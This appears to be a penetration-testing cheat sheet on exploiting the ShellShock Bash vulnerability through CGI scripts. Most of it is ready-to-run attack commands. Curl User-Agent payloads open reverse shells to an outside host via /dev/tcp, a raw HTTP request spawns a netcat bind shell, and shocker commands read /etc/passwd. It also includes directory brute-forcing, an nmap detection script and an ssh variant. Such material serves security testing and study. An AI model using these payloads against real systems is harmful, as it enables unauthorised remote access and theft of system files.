# ShellShock Bash can also be used to run commands passed to it by applications and it is this feature that the vulnerability affects. One type of command that can be sent to Bash allows environment variables to be set. Environment variables are dynamic, named values that affect the way processes are run on a computer. The vulnerability lies in the fact that an **attacker can tack-on malicious code to the environment variable, which will run once the variable is received**. ![](https://3331885100-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MkfTlo0T97eXbWuX_cT%2F-MkjlkqM44o6R2dylsgC%2F-Mkjnj_NdaaMGiwxvhRV%2Fimage.png?alt=media\&token=380ac009-facf-4fa8-a3c4-2dfd9fab386c) Exploiting this vulnerability the **page could throw an error**. You could **find** this vulnerability noticing that it is using an **old Apache version** and **cgi\_mod** (with cgi folder) or using **nikto** ## **Exploitation Steps** * check for any cgi file on server , * If you found any directory of **/cgi-bin/** use extension like **sh** and **cgi** and bruteforce the directory ``` sudo python3 dirsearch.py -u http://10.10.10.56:80/cgi-bin/ -e cgi,sh ``` * If you found any **.sh or .cgi file** , you can use **shellshock reverse shell** to connect back to us * We can put payload into **useragent** to execute it - ``` curl -A “() { :; }; /bin/bash -i > /dev/tcp/192.168.2.13/9000 0<&1 2>&1” http://192.168.2.18/cgi-bin/helloworld.cgi curl -x TARGETADDRESS -H "User-Agent: () { ignored;};/bin/bash -i >& /dev/tcp/HOSTIP/1234 0>&1" $ip/cgi-bin/status ``` ``` echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc $ip 80 ``` ## NSE ``` nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi ``` ## Shocker ``` $ git clone https://github.com/nccgroup/shocker cd shocker ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose ./shocker.py -H $ip --command "/bin/cat /etc/passwd" -c /cgi-bin/admin.cgi --verbose ``` ## ShellShock over ssh ``` $ ssh username@$ip '() { :;}; /bin/bash' ```